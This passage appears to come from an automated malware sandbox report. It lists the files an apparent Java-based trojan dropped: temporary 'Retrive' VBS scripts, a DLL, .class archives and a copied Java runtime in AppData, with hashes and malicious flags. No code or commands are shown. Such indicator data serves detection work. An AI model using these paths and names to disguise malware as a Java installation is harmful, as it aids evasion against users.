SHA1:	F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
SHA-256:	9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
SHA-512:	AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6799039488535261462.vbs
File Type:	ASCII text, with CRLF line terminators
MD5:	3BDFD33017806B85949B6FAA7D4B98E4
SHA1:	F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
SHA-256:	9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
SHA-512:	AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\Retrive8817309470254096997.vbs
File Type:	ASCII text, with CRLF line terminators
MD5:	A32C109297ED1CA155598CD295C26611
SHA1:	DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
SHA-256:	45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
SHA-512:	70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\Windows8952294696781336921.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	0B7B52302C8C5DF59D960DD97E3ABDAF
SHA1:	D85524F464DCDED54EDFCFE6A5056F6C4008BBCB
SHA-256:	A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
SHA-512:	FA04A69CACD05042DC9F3EF0BB518B01952B59A5A2669BA3817C3E248E95F54801349CB51FCFA7CD1F3C4CB7C28615A61156D574C4F7197FDBA709544A5E8EBC
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\_0.4312212827200392546983382786626386.class
File Type:	Zip archive data, at least v2.0 to extract
MD5:	781FB531354D6F291F1CCAB48DA6D39F
SHA1:	9CE4518EBCB5BE6D1F0B5477FA00C26860FE9A68
SHA-256:	97D585B6AFF62FB4E43E7E6A5F816DCD7A14BE11A88B109A9BA9E8CD4C456EB9
SHA-512:	3E6630F5FEB4A3EB1DAC7E9125CE14B1A2A45D7415CF44CEA42BC51B2A9AA37169EE4A4C36C888C8F2696E7D6E298E2AD7B2F4C22868AAA5948210EB7DB220D8
Malicious:	false

C:\Users\LUKETA~1\AppData\Local\Temp\_0.94322696032766358809744035144248591.class
File Type:	Zip archive data, at least v2.0 to extract
MD5:	781FB531354D6F291F1CCAB48DA6D39F
SHA1:	9CE4518EBCB5BE6D1F0B5477FA00C26860FE9A68
SHA-256:	97D585B6AFF62FB4E43E7E6A5F816DCD7A14BE11A88B109A9BA9E8CD4C456EB9
SHA-512:	3E6630F5FEB4A3EB1DAC7E9125CE14B1A2A45D7415CF44CEA42BC51B2A9AA37169EE4A4C36C888C8F2696E7D6E298E2AD7B2F4C22868AAA5948210EB7DB220D8
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\83aa4cc77f591dfc2374580bbd95f6ba_041d84af-7e76-450d-8340-55db3c73c359
File Type:	data
MD5:	C8366AE350E7019AEFC9D1E6E6A498C6
SHA1:	5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
SHA-256:	11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
SHA-512:	33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\COPYRIGHT
File Type:	ISO-8859 English text
MD5:	51F72C3C2569E1174A83A294F7C082D6
SHA1:	1909C04288DD294DD539723C0CA3289656ADE95D
SHA-256:	89471AEA3957922DF21C7088D2687C4E43F5FF14E635E7D971083DDE540B45E3
SHA-512:	14F13277AFABD4DFB0B7E53B7E0D6BDAF8127FD97E478F203D4112F7AAC9868EE27B4A97B9FCF4A0AE868AEE6872AFC1DE2FFFBEB1E7DA4E3FF08757731E9788
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\LICENSE
File Type:	ASCII text
MD5:	98F46AB6481D87C4D77E0E91A6DBC15F
SHA1:	3E86865DEEC0814C958BCF7FB87F790BCCC0E8BD
SHA-256:	23F9A5C12FA839650595A32872B7360B9E030C7213580FB27DD9185538A5828C
SHA-512:	AC2C14C56EEA2024FCF7E871D25BCC323A40A2D1D95059C67EC231BCD710ACB8B798A8C107AAD60AAA3F14A64AA0355769AB86A481141D9A185E22CE049A91B7
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\README.txt
File Type:	ASCII text
MD5:	0F1123976B959AC5E8B89EB8C245C4BD
SHA1:	F90331DF1E5BADEADC501D8DD70714C62A920204
SHA-256:	963095CF8DB76FB8071FD19A3110718A42F2AB42B27A3ADFD9EC58981C3E88D2
SHA-512:	E9136FDF42A4958138732318DF0B4BA363655D97F8449703A3B3A40DDB40EEFF56363267D07939889086A500CB9C9AAF887B73EEAD06231269116110A0C0A693
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
File Type:	UTF-8 Unicode (with BOM) English text, with very long lines
MD5:	AB9DB8D553033C0326BD2D38D77F84C1
SHA1:	D13CAC18FEC0C71D4A5CB550F6FA93FC60C39E45
SHA-256:	38995534DF44E0526F8C8C8D479C778A4B34627CFD69F19213CFBE019A7261BA
SHA-512:	178EABC5D8883E3E0A32F40ACDC8DB5A80CBABFA6689D3902880FE521B1A84425758F22CC7DD236416033B20A3FADCE6ACC03DB579F582BAE2C0AFFC0B2ECA5E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
File Type:	UTF-8 Unicode English text
MD5:	C1A053870CAEA266AE00C5C87A76E17D
SHA1:	449706B58D6EC5FE49F4B4043B7048E3340A9A92
SHA-256:	65C849F8E75D92CE0A7F979A4699E8BB46E286257DBCA501499FAA1467D5E46C
SHA-512:	7A697A1A4AEF27F6EA4AB72EDEBB2228A532E13BBA3CA8D61699A7E74FB7AD238209FF1B76E21850FE7AA3CF50166E0775566B56D98A94351179C2F8D216C083
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\Welcome.html
File Type:	HTML document text
MD5:	55FB6ECFB9C81819A76E8D91D83DFC6B
SHA1:	8D1DB6CD5DF4626EEE7DF051E2DEDCF28ED08B51
SHA-256:	84599B5F0C5ECA91886B743C17A9614E77FACF1E31F6F11FC59A60DD60DD40DF
SHA-512:	5EA60538F50D38AA9432D1482EFC0BC69051C8982DCC6FB5125C4E4A778FF0C69ED811A62BCB6F63979C2A44866C6CCAA4910ACF4AD15E4654CEBC93076E8781
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	00E0C05619D79213B95CAD6050610170
SHA1:	C406B0FB1D34339FE917565CB5BDB15FED1125B9
SHA-256:	5801F7CDC0E7E51C931E3652CE031864A55B5044E524AD4886C5EF38DD0B2412
SHA-512:	577934C1997DEBB3E61E9E666B0CE1FA98840620CB34955716727E1BD8F2F41F5D816E9CDB110A9EF999FC8323B55F45A0C5222097A805D6C839F7D631C5BD96
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	B0E11CBCFDCB76475DABA8A64EFA2342
SHA1:	9D30E43CFA7A578942B02262C18D9BEDE7D86F84
SHA-256:	A8A29ADC8B64F723298CCB00322A47844C7A1C83D1054F8E702F79246ED50A8B
SHA-512:	15127F67D44F96F19460FE8A6BBBE3D208977C80E4C3EE072C0B8B004C781516018BAB22D90C08D333B5392C803CEEBD70167087D6E3151CECD9954ABE344503
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	6C9FF3DDAB045FE7375FA33663DF6922
SHA1:	5F6F71131F50CFFC64D220EF2D01373E1AFBF81D
SHA-256:	917F2E127ACEE79FE034DA56B4813FDC0AEEC607F0C6AF835F18CF21552EA892
SHA-512:	7E406AEA67F3AE4099652E724F7AFCEB266BA350FDD7C5F40CFAF17A5E63EEEB3B18A4062A27F8CD2F09702573A81B29112A8DCEA59A82DAB13035DC45167960
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	F1A828FE3BF1DA7FC2160BEBDBA9F481
SHA1:	DCD26A9A2D73EC83A1B0052BF80A742E2944BE07
SHA-256:	746B60FB63A4ED89B77FAE70B063AE56658866D74293AB2229DE12D0DC7A641A
SHA-512:	26BEBFCBA898B89DEDC9107A25322CCE8D53D7F3234228A09EBA5FBD7B017680360709EBDD818BFED0822B62EDEEB4B549671BDD2CF18415FE49C4CBAB3A61B3
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	1AF266A286FD90BFB2907BCBEFA905EB
SHA1:	A369C943885297F786B7A32AE49B4080244039B8
SHA-256:	94BAB5BCE0E2989D3B68D3C3B85A1DF8A91C1D4AC291DD541F3E4250946185A8
SHA-512:	2A81DB03B4672374ADF3AC0073D8972116E19A438588E114F060039AF4BB2E2FF9BC5C7E6BDE65273843DD36FEE6628FAC5797CFAA43C4CB14BD237981806560
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\client\Xusage.txt
File Type:	ASCII C++ program text
MD5:	B3174769A9E9E654812315468AE9C5FA
SHA1:	238B369DFC7EB8F0DC6A85CDD080ED4B78388CA8
SHA-256:	37CF4E6CDC4357CEBB0EC8108D5CB0AD42611F675B926C819AE03B74CE990A08
SHA-512:	0815CA93C8CF762468DE668AD7F0EB0BDD3802DCAA42D55F2FB57A4AE23D9B9E2FE148898A28FE22C846A4FCDF1EE5190E74BCDABF206F73DA2DE644EA62A5D3
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\client\classes.jsa
File Type:	data
MD5:	A86E5A890BA566B3BF60266CEF9ED944
SHA1:	873E231EA683A3B059A7FBF6D86FA8A971148289
SHA-256:	291A508196AB040C896D296111066EDC91867818DAB7EE5ECE8612EED3604A1B
SHA-512:	96610B2BE00D5902EF87A824CE5700C8D7EFB48411220591EFE9B1254997EE241A7C1ADB72B049D0B624555EAF73F4F099E0121B5BC33A9DCA11EAA806D23214
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	69F4C331CF2FA5E6757FFB74813ACBAB
SHA1:	CF75071F54D19BA156D686A0F7F428B38B6D235C
SHA-256:	7C87B9B0A466D6EB813E2366734572166C56329F6312D6A0420CDDA41DAF079A
SHA-512:	B6FFBAD63C3EB34DA2580C5F736901DD5E4E4B8BC0B3FD5913F7B1E6AACE217E631B71EE4079AE8CFEBF3BED326B28BEFB9AF3D732235620426EA102A05440CC
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	EF34F23B67BA4E93F94149FD52E12C4F
SHA1:	47E0325D4723B90EA9DA956077B8542BBF115FF7
SHA-256:	A89D0C6A1531837ECAD1F6845CFA471700BB612F3B99760DB6EF53B97F324604
SHA-512:	83AA25099CB8C7FD6DF9536BBA5F84B7E1C5AF05F88E76353DA434F9988DC9CCD30E720CA27E8F2A60751713BFDC09DC27EB5CAD9A573DCFDCF7AF9C91EE1F9D
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	057A2893EB2B001B1D429419D67E32B7
SHA1:	CC3B8EEAC10F7F4F4A5DE71F75ED980AE85CB082
SHA-256:	9E50D25CBCE3D7CE39BBED9EE74166BC09A9F0C6637A50C0D7F415B3D6B31D52
SHA-512:	6147E6E1C82F5286C6F979CC0696B19F522EE512949FEA766787F8C6948E17CBD33165193C28DC30EBDDE6CA495CD448C21A12DAC75CF437D7FDC4FE1BD60D93
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	1CC4E97C8A14CBD5CFCFA09C514FBADF
SHA1:	A887FFDEB1CD88EF2B5FDE36906806C8A523747C
SHA-256:	A7B9683FE73715B24D41BA4C88DF4863BECA9403DDC3EAD30046443E448B45A5
SHA-512:	4AE869AF12B44F4D48BDBECE8456525B79801E752B00602558C7AC1127C261A466EFD6322C13AA76304DAC05F7B76EA54C1518FDF88D45592509C785820D6EF9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	552ADA56DDB0D9C6A811806895CD337B
SHA1:	A07E39B62926BF448E2E2B458A88D2BE1B3B6D7F
SHA-256:	96226E26422D54F1ECE0E2925B1EB2BB931D187D98276918D1E70C0134663843
SHA-512:	A699DACA179E100A066151C94D66D00DD0657EA3FF6B8E99AC5135F6E119A5612431DF568C5DE9E5EDB04DD3B4303F9571C701FA759BDC97A3E7F1BC10D1C940
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	51D9B229B5049B18DA862F48771D3ADF
SHA1:	1B4F3D6A5DF38431D0129C6411BC588C5AC2E3D7
SHA-256:	1774CCBC4A081A7DC5AF62C84E082EF4873286ACE8E5A4E1FBF1C93BE9781D03
SHA-512:	1F5EF89FF0033F5831F4DACA462DD7D846777AE4116EF6C40F35C57F973143FEB77E0565D8A879C8CEC99611CA425977B7E61B109093FC78F6CE5804207E2867
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	7BD5D5254C02219AD8D6793A07380155
SHA1:	2DFD9A53B7ACE17D3167F19E7C48FB0239606436
SHA-256:	106F23ED681B8C602672F38B6700480065666227769FEC281BC1D1A1ADBB5205
SHA-512:	75724EBF44A54F638429C966F82F3B23ADEC74424789EF530065274E7BC562B9838ADB38CA9A61B1DD1FA82FC721EB17CD16A156C8D82D2F42781247047DA128
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	F47B4F0D0DF0C28759B60CF0B0090A11
SHA1:	257A3ADE3D1EE1C0FAB945C5159A887E02D62764
SHA-256:	5E9421DEFFA01DEC2434E917ADFF8811E2A57F686D0560244BEB22107E76A1DC
SHA-512:	DB3FCC10034B572DFAFBF3AD7C51BFEC32FD4C955646D2CFF5B171B9E4E1480028645F23C996269F5FB2D8254AE4A96CB70B82103B88A7BC5264DC77341EFD88
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	A58E04E403FC15ADDAA9EAA114EDD149
SHA1:	59C7FABC8D8ACBA81651C7C3EA49FDB97ED4A286
SHA-256:	77C6795F5A43988D059828A712DAF81F263A3DB23A7EFEA760EC7AE65B641B77
SHA-512:	D9419A7D09D2C765EC4E8AF52D4C6B46E660617FB66587590537997C902C5E5B5B1A2CD3E9986E0DCD1314372D75A19FB3317F967C60738697231E453D830CFA
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	ACB85946547A3DDC5587BCB454CE80FE
SHA1:	D9A475915DB548582803BD6AEB2C7CABC9C43968
SHA-256:	B86BDD28AB020B3FDC96D860E20802DFE5DAE1CAF1AD8FF1204428EF4BDE5EA4
SHA-512:	88C385F136325E43BED676D8176DF4155D491C8BCBAF3C8372B3F3922679818EEC7D662EB359C9E7F60CDE1CD805FD11CFFFE8FF3A649A9D07256902C7292180
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	9FD51B428C6D90D1452C883EA4370C30
SHA1:	FCA61CD4B0586C0ACE187535BBC68AEB9FF03A00
SHA-256:	5FB486CEA6EA41636682D877443E07184A454651F209A72C6874C38F1FEF1751
SHA-512:	0EE75C061D463B1C0BFE473862193B56337E6F303084AFFE7B96FFD50264B2871484ADA89B2421F0DF37A833597C372FDC7D0EA93F37AAAE31B765A5BE7C7EA6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	FCF703012EC24F5D1D0855A30893C49D
SHA1:	02700F3BC72CC7FB10B33DD7D80F5B8A7D42596B
SHA-256:	1F1F9CF93B85646ABD85BD4EBC1E197A3276789A74EAD7D6BC80C45B65117728
SHA-512:	C1619C714754DAFC042B7A12115B0BA9F0B4677C309DBBF0EF3C46D17F185EED5BD8084B4D0FF9EC003699C6D7F5794833FEEB6AE23F70CEC49EDB26BBB70A63
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	F0AA7A0ED378705A3A6D185E2FAF2F6B
SHA1:	3374E62E72850496BF682FDC995CA3C496C2F76B
SHA-256:	FB95F112F1F588F9482C687B7A32913E17A7D0630E55F0AF79041ABE8BA3A66D
SHA-512:	632B406D5597518C2B439A198C1F88671AE79302106922696BF6B2BBCEF93912027504EF002F73AF2871C9D41B7D46AF954FEEFB26A862AD773AC74974509CC5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	A637AA0ECCF29F21A1BEBBE73AF6979C
SHA1:	D82EDDC337F96B5C16F24A96D891A64626133F92
SHA-256:	67814AE300255A10819EA9096220B2F0324F8D1CF7B6086DD6E9E2503681C0E5
SHA-512:	63A724C1EDA023652B2E0C2F70C49EA18BC646E999AA2E68F6E1D8ABAC381C961FE5CF12B1144635CAE50BADFB29610725C08F365D3FAFE4974A67037324D7F9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	9C96C90520532227A6AB73F24375F45A
SHA1:	6F0AC47D24F0E2589322A4885C813601C306BBA2
SHA-256:	1D20E73365E4163D443806E83E969400ADBC2A0FF05C126F0F58924CD6AA74D7
SHA-512:	166C5658656A8ED44689395387812E40D84B5DA9AF5E7452B9DC2E1DE01BFE9D3780F8D3347832D2C5C81CE4532B7E850F0F4C68554BF994CB98A16F1B5EF7F0
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	37A55FD43F92AFB29C8FEF138E43C2B8
SHA1:	9515C861AD56B590EE7599DC75862744282FF1FD
SHA-256:	7EDC1D9856E684606EA79EF244ECE92820E0FD811D5967218C34548D3FFA4545
SHA-512:	E2E1DF30C39113D4A1E9A88C8A7A47331FD95F5DCE0820DDE2FC5150B918B2C3EC6DD53EEE4465DDD4D74A5449F9D91ABEA064DA7A365E5ED340835CB2A3C219
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	D3947B63B1F4BFFEF17E2B100E0CE60E
SHA1:	A4CD3D8C9AA93D2F6A16D5250416AAB36E4ED3CA
SHA-256:	A7D3070762451358409A2D56E0B87622793BF40DC9EF6D441B52C2151DCBCFF7
SHA-512:	FBD4CA34FF385146DAF8E51DC88EE4B0B1CD481901FEA7AA0962F3629306ABE50EAC497C184C7D3D73559E6141E957189279243E853330803329693BCA96D7DC
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	D9B44F5D9E1CCB444CA43E53AB6C0E9F
SHA1:	545FEE4CA4170352F794835C4F757317E976BC3E
SHA-256:	978630DBE6FD872462BE4D3864184BF343C1321E238C4EA04B04B7F94906B105
SHA-512:	468CF02EDF2F72E3388B08669161D8CC8A52F4B3925D902EB03DF06086712693BC500EEB056F34496A67AA1EA547E0BCE6391F75F89154830A4D8DFEC741ACBD
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	6A50E2F0AF124C28FC8AA0124875BA39
SHA1:	FC8B4C75A38341F1FC90E0319DD77D735F77A981
SHA-256:	38F6D378A8C80A53242A64CF15F40D5BB35810E6702F46D9CD5E08BC024EBFB7
SHA-512:	6CD754F691BD254338E74580C7D00DCF5058AC0230BE8A166024B1DD1DB34AC5CB213DE4C02B7E8BD68AB8292E95324012183DFBB6993AE81E8098FC45EEE9E6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
File Type:	PE32 executable for MS Windows (console) Intel 80386 32-bit
MD5:	9A97AB583FB5BD6FFFCE8C47E6DCCA62
SHA1:	C010071C795EE049C91901C315523B43BB42FC25
SHA-256:	6770D372B4089D8577F634C8EFB83B175C95A8A48362A479CD42E3C4B4D21C53
SHA-512:	AFB53A6014951DA907FBA091F8D05F5749DA85DA3BDD4217C1F8C01638A68ADF36652FF8C00B33AA468A864736B94190FFDB9B4BD9B8EEE0AB298A04423DEE12
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
File Type:	PE32 executable for MS Windows (console) Intel 80386 32-bit
MD5:	CBE5D74B4ECC80BF2C792C18CCEA92BF
SHA1:	82D15287FD6C67A8BA13805E6438E015A943D960
SHA-256:	5C34196ABCA07B5352D009D5804C74CBE7A2DEEA36C3707CFA12EFD18FC2688B
SHA-512:	F69507DC2285CE2642ED8FCBB97DB1D5D8BB31D4D633993F593CC6995AFBE8784A2B1F37424B487565712D83403EFF2FBB990EEC548E29D08A48C298CAEED3FA
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	A96533FF8530AD3435A5126C88DD34F9
SHA1:	2A25192283AD0A3190BBE1D56AE53195D4EE7C8F
SHA-256:	0ED046B5CAB77528BFFE08D98A0D3A916E6EC676E16BDEDC23953AD82CC20975
SHA-512:	74CB45185DFFEB978692494331C261282BBE22F883BA53B57FB6F976CCC37E3F8FDD68A48C061BBED5F37BBE5BA8134A29ED63B7179240F7A01341E4D785175F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\java.exe
File Type:	PE32 executable for MS Windows (console) Intel 80386 32-bit
MD5:	6F4EB294ACF731771AFE3EF6F7EE812D
SHA1:	B394901A279C11734DCE92DFD6B5D2F5E5B8076C
SHA-256:	0378F325E6750868430B9C6FE0619B944810D49F1686B57AE8ADF14C37EB0B6A
SHA-512:	4615183FE34693A3FEBAF3A0616D29F605C61AE0B0024C528279703302BD362D17AB2D78CF55F2B637C5FC2E92A73B37D45C70656A50A666A4DA8D411AB01C99
Malicious:	true

C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	478BDA55036ACBC0EEE4A31C3BE7054C
SHA1:	D2D1A4299F11A98646B2E5D4994E6FC710533910
SHA-256:	795EA58B3AABD0C222556FCC41024D5569F149F707582E968D1957B55694C6F6
SHA-512:	D759ACE64EEFE2C900CD55F6036082384B4CB114DBB0D6095EC1EF413E01F22E3E9B29BA93B6C7A63A20627ADAF3B57E6A242A58841260F8EB3A93F04F8CB173
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	756DD54AE83EB09996BA35FF49DDD074
SHA1:	98F17C09BA9374EBD10348F446819E8CF1093E21
SHA-256:	DCFA29224930D7E8DAD9809457AABE3AD574E38C462CA4EEDEFB8952E3A003F5
SHA-512:	95482BC79124C38D37C51963E64951795C9670B3FB82494F6C84654E0ED94B4947740FCBBCC042621B67B23F186A683115B2D1CF2E912DF28477AD69EA03E78D
Malicious:	true

C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:	B189CEE3C0CB5C9EABBF70329E0F4195
SHA1:	1FE87B9C1CF10EA026520DD60E3C74EBA24AD457
SHA-256:	FF851ACE2EF7EA8D002EEA6D8E6FAD835F5AD5575BA083938C57416F47ECCE37
SHA-512:	D6AF6CE3D67C3BBFA3E2B48AC47DA35099A95602C3C2ABF1C82EF6BF8FA346CEBE05B468DF2E48C3C31F89FB7331881F58E6A55BB415E175679B17365599B768
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	661B301EC2FF6103A5E6C6430F540D7F
SHA1:	E2AE51BB5B166DA592FDAD0866083345FB4B6386
SHA-256:	8A33EA86E49FC26E73914E26401075EB79D7052DCAD756469334DB9A3C645A00
SHA-512:	D138464C321D3DD867BC423CB2F0735DB88D0DE465256D7130ECA6D7796394FFC05D01D970D7EA3D0200E77CCFC82225E150445D11BE444E668056D6E043E3D6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	773A1D753101335331537450BA5B7CCA
SHA1:	B9E1AD266A1C522019F9DB26D8554721B6174DDD
SHA-256:	ED32394F90D1F2F731DE956E4BD800548CF97F3F872B03F4497B91C669C3630B
SHA-512:	B6D12D9DCC34585C398FC77358F12E8ACB3DD80B9B2605D3CE4F4FE3C1151C3BE71F461AABF1C336CEC3203D5FC8C87BFA62ED7B13D86D70D249737087BD16E7
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	959A460FFF1FC5DDDB57702D5048D60F
SHA1:	D963ADFC3D87D839107D2165D7C7E3B9E66EDA25
SHA-256:	E4D934BC9C35FF4F2E60CE7C3DC5862AD7DB1ADE069E2C73B2396D1428ECD3EE
SHA-512:	942F3DF20D0E9332C43F34631B378BA2ED1CC58E913E3A133A4988E55B3A52021CB2E2C6C4A5A920BBDB21448138395EED76B62BCC4024A7ADDE01DD4382FAEC
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:	C731C96456335BDAA2F58220AE25A202
SHA1:	54E1E9A3BDA04775A09660949622A7579A6042FB
SHA-256:	EB1EEE4B4E4343EC3EEA5430786D605A07CF2E8344C55C0972A95421AEAC78C4
SHA-512:	EB9A74B982B5EED61FCC1DF228EB4760B7A41898BC9E6C5E501FCBEDC2CB5E405000E7AD8AE021D074F1B21670D72CBB64E8AD24C63143BC437CF96801708454
Malicious:	true

C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:	9DAEE38424615751379400964713D6D7
SHA1:	F9A4C9E8CEFA5141FC798FEBA2453C8A0E4BAECC
SHA-256:	196930390C56C711DFA4E1CC42109CE5D957DF016C9CB7BF0C6F30C79A3A71F5
SHA-512:	C739EB963AB9C868E19134DFE955E6B65B51036AB1EB7DA18D8466E8EF90EFA9AF33D3119EC0FC695D730C8779517A4D432D3F480B5202FD7291BC3937D73442
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	E3FFC51723A9F841777B84C98DEEA2C3
SHA1:	766098CBF335EB1895F7EE8E9A82A2E2D634D98C
SHA-256:	241037DB7C0AFD5E9FB0DADA97DF018B9DA2813BAF8CF8132794EB4ADC9F8412
SHA-512:	F57252A6B1A1E2BBA6809AA73B242D85031ACF4B7B9B331B2A5FFF4D8BF30514AFA835305B81CFBC126D73D6F20DC0D49955F7612013C9282FECC570B13AE4FF
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
File Type:	PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
MD5:	53B2A7DB8DDC169929CF060EA986CB5B
SHA1:	674349D59647994264BB83005A98F1411353685F
